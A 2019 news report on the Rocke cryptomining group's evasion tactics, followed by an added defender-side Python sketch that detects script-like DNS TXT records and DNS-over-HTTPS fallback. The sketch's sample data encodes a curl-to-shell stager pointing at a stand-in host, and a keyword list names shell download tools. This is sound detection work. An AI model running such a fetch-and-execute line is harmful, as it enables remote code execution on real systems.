16 October 2019

Chinese cybercrime group Rocke uses new tactics to evade detection

Chinese-speaking cybercrime group Rocke, believed to be responsible for several large-scale cryptomining campaigns in the past, is now using new Tactics, Techniques, and Procedures (TTPs), including new C2 infrastructure and updated malware, in order to evade detection.

First reports on the group’s illicit cryptomining operations emerged in August 2018, when Rocke attacked unpatched Apache Struts, Oracle WebLogic, and Adobe ColdFusion servers and infected the compromised hosts with cryptomining malware. Earlier this year, researchers from Palo Alto Networks Unit 42 discovered new malware samples used by the group for cryptojacking that uninstall cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud from Linux servers. In March, the threat actor was using a dropper dubbed LSD that was controlled via Pastebin, but this summer Rocke switched to a new Command and Control (C2) infrastructure, moving away from Pastebin in favor of a self-hosted solution, according to researchers from cybersecurity firm Anomali.

“In September 2019, the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPS (DoH) if the DNS query fails,” the experts said. Fetching the scripts from self-hosted infrastructure and DNS records makes the group’s malicious operations harder to detect and harder to take down, they added.
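As an added example (not code from the article or from the Anomali report), the following defender-side Python sketch flags the fetch pattern described above in constructed DNS and egress logs: TXT answers that carry script-like payloads, and DoH lookups of a name whose plain-DNS TXT query failed. The log formats, the resolver watch-list and the sample records are assumptions.

```python
import base64
import re
# Public DoH resolver hostnames to watch for in server egress (constructed list; tune per environment).
DOH_RESOLVERS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net"}
# Substrings that mark a TXT answer as a shell stager rather than SPF/DKIM/verification data.
SCRIPT_MARKERS = ("#!/", "curl ", "wget ", "/bin/sh", "bash -c", "chmod +x")
# Constructed log formats (not any vendor's): one line per DNS answer, one per HTTPS egress request.
DNS_RE = re.compile(r'host=(\S+) qtype=(\S+) qname=(\S+) rcode=(\S+) rdata="([^"]*)"')
EGRESS_RE = re.compile(r'host=(\S+) dst=(\S+) path=(\S+)')

def looks_like_script(rdata):
    """True if the TXT payload, raw or after base64 decoding, carries shell-stager markers."""
    candidates = [rdata]
    try:
        candidates.append(base64.b64decode(rdata, validate=True).decode("utf-8", "replace"))
    except ValueError:  # binascii.Error is a ValueError: not base64, so keep only the raw text
        pass
    return any(marker in text for text in candidates for marker in SCRIPT_MARKERS)

def analyze(dns_lines, egress_lines):
    """Return {host: [reasons]} for hosts showing the TXT-record / DoH-fallback fetch pattern."""
    findings, failed_txt = {}, set()  # failed_txt: (host, qname) pairs whose plain-DNS TXT lookup failed
    for line in dns_lines:
        m = DNS_RE.search(line)
        if not m or m[2] != "TXT":
            continue
        host, qname, rcode, rdata = m[1], m[3], m[4], m[5]
        if rcode != "NOERROR":
            failed_txt.add((host, qname))
        elif looks_like_script(rdata):
            findings.setdefault(host, []).append(f"script-like TXT answer for {qname}")
    for line in egress_lines:
        m = EGRESS_RE.search(line)
        if not m or m[2] not in DOH_RESOLVERS or "type=TXT" not in m[3]:
            continue
        host, qname = m[1], m[3].split("name=", 1)[-1].split("&", 1)[0]
        reason = f"DoH TXT lookup of {qname} via {m[2]}"
        if (host, qname) in failed_txt:
            reason += " after plain-DNS failure"  # the fallback order the report describes
        findings.setdefault(host, []).append(reason)
    return findings
# Constructed sample logs: a benign SPF answer, a base64-wrapped stager in a TXT answer,
# a failed plain-DNS TXT lookup, and the same name then fetched over DoH by that host.
STAGER_B64 = base64.b64encode(b"#!/bin/sh\ncurl -fsSL http://stage.example.invalid/x | sh").decode()
SAMPLE_DNS = [
    'host=web01 qtype=TXT qname=mail.example.invalid rcode=NOERROR rdata="v=spf1 -all"',
    f'host=web02 qtype=TXT qname=txt.stage.example.invalid rcode=NOERROR rdata="{STAGER_B64}"',
    'host=web03 qtype=TXT qname=txt.stage.example.invalid rcode=SERVFAIL rdata=""',
]
SAMPLE_EGRESS = ['host=web03 dst=dns.google path=/resolve?name=txt.stage.example.invalid&type=TXT']
```

Running `analyze(SAMPLE_DNS, SAMPLE_EGRESS)` flags web02 for the script-like TXT answer and web03 for the DoH fallback; the SPF record on web01 is not reported.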

In previous campaigns the Rocke group was observed exploiting the CVE-2019-3396 flaw in Confluence servers to gain remote code execution and deliver the miners, but recently the attackers added new functionality to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088, an ActiveMQ vulnerability that allows an arbitrary file to be uploaded.

To ensure that only its own cryptomining malware runs on the infected host, the group tries to terminate all other processes with high CPU usage. The LSD malware identifies its own miner by the MD5 hash of the file so that it does not kill it.

“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity. It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future,” the researchers concluded.

Additional details about Rocke’s activity, including Indicators of Compromise (IoCs), are available in the Anomali blog post.
